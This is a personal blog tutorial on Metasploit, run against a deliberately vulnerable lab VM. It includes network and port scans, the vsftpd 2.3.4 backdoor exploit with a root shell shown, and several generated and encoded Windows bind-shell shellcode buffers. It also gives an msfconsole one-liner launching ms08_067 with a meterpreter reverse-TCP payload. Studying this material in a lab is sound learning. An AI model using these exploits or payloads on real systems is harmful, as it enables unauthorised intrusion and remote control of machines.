Saturday, March 12, 2016

Kali Tool Series - Metasploit

Preface

This is the first post of Kali Tool Series I wrote as my own studying notes.

Introduction

Metasploit is a vulnerability and exploitation framework with a collection of exploits designed for security proessionals to perform security assessments.

Few facts about Metasploit:

  • written in Ruby
  • acquired by Rapid7
  • integrates with other common penetration testing tools: Nessus, Nmap

Also, it’s worth to know that a successful service exploitation requires following elements (reference):

  • vulnerability: a flaw in a system which can be utilized as an avenue of attack
  • exploit: a program specifically designed to leverage a vulnerability
  • payload: code to be run on the system after the vulnerability has been exploited

Modules

Before started, it’s better to briefly understand the modules in it, which can be roughly grouped into followings (reference is here):

Auxiliary modules

Useful tools like for:

  • intormation gathering
  • enumeration
  • port scanning
  • connecting to SQL databases
  • etc

Exploit modules

Modules used to deliver exploit code to a target system.

Post modules

Post exploitation tools for things like extracting passwords hashes/access tokens, taking screenshots, key-logging and downloading files.

Payload modules

Malicious payloads used after an exploitation. In Metasploit, it’s better to upload a copy of “meterpreter” payload, which opens a meterpreter backdoor smoothly.

Testing Environment

Okay, since what we are doing here may create some changes (or you can say damages) on the target machine. We can’t do this on a deployed machine without permission. Therefore, I setup a Metasploitable virtual machine as my target, which contains lots of vulnerabilities by default.

Both the target (Metasploitable) and the attacker (Kali) are virtual machines under the same local network in my following tests.

Working Flow

Here’s a demo flow using Metasploit.

1. Information Gathering

Host Discovery

First, we have to locate the machine by scanning my local network (192.168.0.x).

I’m using ARP scanning:

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 192.168.63.0-255
RHOSTS => 192.168.63.0-255
msf auxiliary(arp_sweep) > run

[*] 192.168.63.1 appears to be up (VMware, Inc.).
[*] 192.168.63.2 appears to be up (VMware, Inc.).
[*] 192.168.63.156 appears to be up (VMware, Inc.).
[*] 192.168.63.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, 192.168.63.156 would be our target machine since others don’t seem like a normal device.

In addition, of course, one can use Nmap to do all the work for this part instead:

nmap -v -sV 192.168.63.1/24

Port Scanning

Then, we scan the open port of our target machine (192.168.63.156):

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.63.156   yes       The target address range or CIDR identifier
   THREADS      50               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
msf auxiliary(tcp) > run

[*] 192.168.63.156:25 - TCP OPEN
[*] 192.168.63.156:23 - TCP OPEN
[*] 192.168.63.156:22 - TCP OPEN
[*] 192.168.63.156:21 - TCP OPEN
[*] 192.168.63.156:53 - TCP OPEN
[*] 192.168.63.156:80 - TCP OPEN
… (dismiss)

By knowing which ports the machine is using, we can know which services are running on it.

2. Find Vulnerability

To find vulnerability, we may need to know the version of the service, and look it out on the database to see if there’s any known vulnerability.

Find Versions

SSH:

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ssh_version) > run

[*] 192.168.63.156:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

FTP:

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ftp_version) > run

[*] 192.168.63.156:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, the target machine is running vsFTPd 2.3.4.

Check Database

Let’s focus on vsFTPd, which is more likely to be vulnerable comparing to SSH. So, go to exploit-db, search keyword “vsFTPd”, and luckily we got “VSFTPD 2.3.4 - Backdoor Command Execution”.

To sum what we’ve got so far: the target machine is running an outdated service which contains a well-known flaw.

Find the Exploit Method

Then, let’s search it on your metesploit:

msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

Nice, the module exploit/unix/ftp/vsftpd_234_backdoor is what we need now.

3. Exploit

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.63.156   yes       The target address
   RPORT  21               yes       The target port


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic

There’s only one payload we can apply for this exploit, cmd/unix/interact, which means that the interaction will be setup directly after exploitation.

Now, we succeed:

msf exploit(vsftpd_234_backdoor) > run

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.63.155:53640 -> 192.168.63.156:6200) at 2016-03-11 21:22:39 +0800

whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

Custom Payload

In some cases, we may need custom payloads, like what I did for Secure Programming class in 2014.

Pick a payload and its generate shellcode (using payload/windows/shell_bind_tcp as example here):

msf > use payload/windows/shell_bind_tcp
msf payload(shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"

Avoid the shellcode contains specific characters (take \x00 as example):

msf payload(shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xbf\x41\x3a\x72\xae\xda\xdf\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x53\x31\x78\x12\x03\x78\x12\x83\x81\x3e\x90\x5b\xfd" +
"\xd7\xd6\xa4\xfd\x27\xb7\x2d\x18\x16\xf7\x4a\x69\x09\xc7" +
"\x19\x3f\xa6\xac\x4c\xab\x3d\xc0\x58\xdc\xf6\x6f\xbf\xd3" +
"\x07\xc3\x83\x72\x84\x1e\xd0\x54\xb5\xd0\x25\x95\xf2\x0d" +
"\xc7\xc7\xab\x5a\x7a\xf7\xd8\x17\x47\x7c\x92\xb6\xcf\x61" +
"\x63\xb8\xfe\x34\xff\xe3\x20\xb7\x2c\x98\x68\xaf\x31\xa5" +
"\x23\x44\x81\x51\xb2\x8c\xdb\x9a\x19\xf1\xd3\x68\x63\x36" +
"\xd3\x92\x16\x4e\x27\x2e\x21\x95\x55\xf4\xa4\x0d\xfd\x7f" +
"\x1e\xe9\xff\xac\xf9\x7a\xf3\x19\x8d\x24\x10\x9f\x42\x5f" +
"\x2c\x14\x65\x8f\xa4\x6e\x42\x0b\xec\x35\xeb\x0a\x48\x9b" +
"\x14\x4c\x33\x44\xb1\x07\xde\x91\xc8\x4a\xb7\x56\xe1\x74" +
"\x47\xf1\x72\x07\x75\x5e\x29\x8f\x35\x17\xf7\x48\x39\x02" +
"\x4f\xc6\xc4\xad\xb0\xcf\x02\xf9\xe0\x67\xa2\x82\x6a\x77" +
"\x4b\x57\x06\x7f\xea\x08\x35\x82\x4c\xf9\xf9\x2c\x25\x13" +
"\xf6\x13\x55\x1c\xdc\x3c\xfe\xe1\xdf\x53\xa3\x6c\x39\x39" +
"\x4b\x39\x91\xd5\xa9\x1e\x2a\x42\xd1\x74\x02\xe4\x9a\x9e" +
"\x95\x0b\x1b\xb5\xb1\x9b\x90\xda\x05\xba\xa6\xf6\x2d\xab" +
"\x31\x8c\xbf\x9e\xa0\x91\x95\x48\x40\x03\x72\x88\x0f\x38" +
"\x2d\xdf\x58\x8e\x24\xb5\x74\xa9\x9e\xab\x84\x2f\xd8\x6f" +
"\x53\x8c\xe7\x6e\x16\xa8\xc3\x60\xee\x31\x48\xd4\xbe\x67" +
"\x06\x82\x78\xde\xe8\x7c\xd3\x8d\xa2\xe8\xa2\xfd\x74\x6e" +
"\xab\x2b\x03\x8e\x1a\x82\x52\xb1\x93\x42\x53\xca\xc9\xf2" +
"\x9c\x01\x4a\x02\xd7\x0b\xfb\x8b\xbe\xde\xb9\xd1\x40\x35" +
"\xfd\xef\xc2\xbf\x7e\x14\xda\xca\x7b\x50\x5c\x27\xf6\xc9" +
"\x09\x47\xa5\xea\x1b"

So, we get a payload withtou \x00, which is reasonably longer than the previous one.

Then, we can apply some encoders onto the shellcode like. To list all available encoders:

msf payload(shell_bind_tcp) > show encoders

Encoders
========

   Name                          Disclosure Date  Rank       Description
   ----                          ---------------  ----       -----------
   cmd/echo                                       good       Echo Command Encoder
   cmd/generic_sh                                 manual     Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                        low        Generic ${IFS} Substitution Command Encoder
   cmd/perl                                       normal     Perl Command Encoder
   cmd/powershell_base64                          excellent  Powershell Base64 Command Encoder
   cmd/printf_php_mq                              manual     printf(1) via PHP magic_quotes Utility Command Encoder
   generic/eicar                                  manual     The EICAR Encoder
   … (dismiss)

Generate code with decoder:

msf payload(shell_bind_tcp) > generate -e x86/nonalpha
# windows/shell_bind_tcp - 470 bytes
# http://www.metasploit.com
# Encoder: x86/nonalpha
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x6a\x8b\xd7" +
"\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28\x07\xeb" +
"\xf1\xeb\x6f\xe8\xe2\xff\xff\xff\x17\x2b\x29\x29\x09\x31" +
"\x1a\x29\x24\x29\x31\x2f\x03\x33\x2a\x22\x32\x32\x06\x06" +
"\x23\x23\x15\x30\x23\x37\x1a\x22\x21\x2a\x21\x13\x13\x04" +
"\x08\x27\x13\x2f\x04\x27\x2b\x13\x10\x11\x22\x2b\x2b\x2b" +
"\x13\x13\x11\x25\x24\x13\x14\x24\x13\x24\x13\x07\x24\x13" +
"\x06\x0d\x2e\x1a\x13\x18\x0e\x17\x24\x24\x24\x11\x22\x25" +
"\x15\x37\x37\x37\x27\x2b\x25\x25\x25\x35\x25\x2d\x25\x25" +
"\x28\x25\x13\x02\x2d\x25\x35\x13\x25\x13\x06\x34\x09\x0c" +
"\x11\x28\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x7b" +
"\x8b\x7b\x30\x8b\x7b\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7" +
"\x7b\x26\x31\xff\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf2\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x8b\x7b" +
"\x11\x7b\xe3\x7b\x01\xd1\x7b\x8b\x7b\x20\x01\xd3\x8b\x7b" +
"\x18\xe3\x3a\x7b\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf" +
"\x0d\x01\xc7\x38\xe0\x7b\xf6\x03\x7d\xf8\x3b\x7d\x24\x7b" +
"\xe4\x7b\x8b\x7b\x24\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c" +
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b" +
"\x7b\x7b\x7b\xff\xe0\x5f\x5f\x7b\x8b\x12\xeb\x8d\x5d\x7b" +
"\x33\x32\x00\x00\x7b\x7b\x7b\x32\x5f\x7b\x7b\x7b\x7b\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x7b\x7b\x7b\x29" +
"\x80\x7b\x00\xff\xd5\x7b\x08\x7b\x7b\xe2\xfd\x40\x7b\x40" +
"\x7b\x7b\xea\x0f\xdf\xe0\xff\xd5\x97\x7b\x02\x00\x11\x5c" +
"\x89\xe6\x7b\x10\x7b\x7b\x7b\xc2\xdb\x37\x7b\xff\xd5\x7b" +
"\x7b\xb7\xe9\x38\xff\xff\xd5\x7b\x7b\x7b\xec\x3b\xe1\xff" +
"\xd5\x7b\x97\x7b\x7b\x7b\x7b\x7b\xff\xd5\x7b\x7b\x7b\x7b" +
"\x00\x89\xe3\x7b\x7b\x7b\x31\xf6\x7b\x12\x7b\x7b\xe2\xfd" +
"\x7b\xc7\x7b\x24\x3c\x01\x01\x8d\x7b\x24\x10\xc6\x00\x7b" +
"\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b" +
"\xcc\x3f\x86\xff\xd5\x89\xe0\x7b\x7b\x7b\xff\x30\x7b\x08" +
"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd" +
"\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b" +
"\x13\x7b\x7b\x7b\x00\x7b\xff\xd5"

or, all together:

msf payload(shell_bind_tcp) > generate -b '\x00' -e x86/alpha_mixed -f output.txt
[*] Writing 3347 bytes to output.txt...
msf payload(shell_bind_tcp) > cat output.txt
[*] exec: cat output.txt

# windows/shell_bind_tcp - 718 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x89\xe5\xd9\xe5\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x49\x6c\x79\x78\x4c\x42\x65\x50\x75\x50" +
"\x33\x30\x43\x50\x6b\x39\x5a\x45\x56\x51\x4f\x30\x75\x34" +
"\x4c\x4b\x50\x50\x64\x70\x6c\x4b\x70\x52\x66\x6c\x6c\x4b" +
"\x46\x32\x77\x64\x6e\x6b\x62\x52\x76\x48\x54\x4f\x68\x37" +
"\x70\x4a\x76\x46\x74\x71\x79\x6f\x4e\x4c\x67\x4c\x43\x51" +
"\x63\x4c\x63\x32\x34\x6c\x31\x30\x4b\x71\x58\x4f\x54\x4d" +
"\x53\x31\x48\x47\x6a\x42\x78\x72\x72\x72\x31\x47\x6e\x6b" +
"\x36\x32\x74\x50\x6c\x4b\x50\x4a\x75\x6c\x4c\x4b\x50\x4c" +
"\x42\x31\x63\x48\x68\x63\x52\x68\x76\x61\x6a\x71\x50\x51" +
"\x6e\x6b\x50\x59\x71\x30\x36\x61\x6a\x73\x6e\x6b\x73\x79" +
"\x64\x58\x6b\x53\x56\x5a\x47\x39\x6c\x4b\x35\x64\x6e\x6b" +
"\x55\x51\x39\x46\x75\x61\x4b\x4f\x4e\x4c\x6f\x31\x38\x4f" +
"\x66\x6d\x43\x31\x49\x57\x45\x68\x49\x70\x74\x35\x4c\x36" +
"\x54\x43\x73\x4d\x39\x68\x67\x4b\x33\x4d\x46\x44\x70\x75" +
"\x48\x64\x76\x38\x6c\x4b\x53\x68\x67\x54\x45\x51\x78\x53" +
"\x62\x46\x6e\x6b\x74\x4c\x72\x6b\x6e\x6b\x56\x38\x65\x4c" +
"\x36\x61\x58\x53\x4e\x6b\x46\x64\x6e\x6b\x65\x51\x4e\x30" +
"\x6c\x49\x32\x64\x75\x74\x47\x54\x51\x4b\x53\x6b\x61\x71" +
"\x63\x69\x31\x4a\x36\x31\x59\x6f\x6b\x50\x63\x6f\x53\x6f" +
"\x73\x6a\x6c\x4b\x32\x32\x6a\x4b\x6c\x4d\x71\x4d\x51\x78" +
"\x37\x43\x65\x62\x73\x30\x45\x50\x32\x48\x53\x47\x44\x33" +
"\x56\x52\x51\x4f\x70\x54\x71\x78\x50\x4c\x30\x77\x74\x66" +
"\x67\x77\x6b\x4f\x4e\x35\x4c\x78\x5a\x30\x65\x51\x37\x70" +
"\x37\x70\x51\x39\x4f\x34\x51\x44\x70\x50\x30\x68\x75\x79" +
"\x6b\x30\x72\x4b\x37\x70\x6b\x4f\x4e\x35\x63\x5a\x77\x78" +
"\x31\x49\x32\x70\x48\x62\x6b\x4d\x77\x30\x42\x70\x61\x50" +
"\x56\x30\x65\x38\x69\x7a\x66\x6f\x79\x4f\x69\x70\x39\x6f" +
"\x39\x45\x6e\x77\x52\x48\x67\x72\x67\x70\x44\x51\x43\x6c" +
"\x4e\x69\x6b\x56\x63\x5a\x54\x50\x32\x76\x71\x47\x31\x78" +
"\x4f\x32\x49\x4b\x37\x47\x32\x47\x69\x6f\x78\x55\x36\x37" +
"\x71\x78\x4d\x67\x5a\x49\x46\x58\x4b\x4f\x4b\x4f\x6a\x75" +
"\x50\x57\x45\x38\x74\x34\x7a\x4c\x65\x6b\x59\x71\x6b\x4f" +
"\x68\x55\x52\x77\x4a\x37\x63\x58\x43\x45\x62\x4e\x32\x6d" +
"\x31\x71\x79\x6f\x79\x45\x30\x68\x71\x73\x62\x4d\x62\x44" +
"\x43\x30\x6e\x69\x59\x73\x52\x77\x66\x37\x30\x57\x66\x51" +
"\x4b\x46\x63\x5a\x62\x32\x63\x69\x70\x56\x6b\x52\x39\x6d" +
"\x63\x56\x6f\x37\x73\x74\x55\x74\x77\x4c\x57\x71\x56\x61" +
"\x4c\x4d\x53\x74\x44\x64\x62\x30\x6a\x66\x37\x70\x51\x54" +
"\x42\x74\x52\x70\x61\x46\x66\x36\x70\x56\x71\x56\x43\x66" +
"\x32\x6e\x63\x66\x70\x56\x31\x43\x72\x76\x33\x58\x31\x69" +
"\x68\x4c\x75\x6f\x4c\x46\x69\x6f\x4e\x35\x4f\x79\x39\x70" +
"\x52\x6e\x70\x56\x77\x36\x6b\x4f\x30\x30\x61\x78\x53\x38" +
"\x4b\x37\x57\x6d\x33\x50\x39\x6f\x38\x55\x4f\x4b\x68\x70" +
"\x6d\x65\x6d\x72\x51\x46\x50\x68\x59\x36\x6e\x75\x4f\x4d" +
"\x6f\x6d\x6b\x4f\x38\x55\x67\x4c\x47\x76\x73\x4c\x46\x6a" +
"\x4d\x50\x6b\x4b\x49\x70\x74\x35\x34\x45\x4d\x6b\x57\x37" +
"\x76\x73\x74\x32\x32\x4f\x33\x5a\x55\x50\x36\x33\x79\x6f" +
"\x6a\x75\x41\x41"

Scripting

Metasploit framework supports the users write scripts to control the process. There are three ways to read a script:

  1. > msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"  
    
  2. > msfconsole -r my_script.rc
    
  3. (in msfconsole)

    msf > resource my_script.rc
    

Database

When conducting a penetration test, it is frequently a challenge to keep track o feverything you have done to the target network. This is where having a database configured can be a great timesaver. Metasploit has build-in support for the PostreSQL database system. (Reference)

Here are some helpful commands:

  • help database
  • hosts
  • services
  • db_nmap: same as nmap but results will be saved in to current database
  • db_import
  • db_export -f xml [filepath for xml]

Conclusion

Metasploit is a powerful tool that allows people can raise attacks with the aid of its exploit database. Although this post only contains the basic usages of Metasploit with one example which is hardly to describe its strength, I will keep update this post if I found anything new and worth sharing.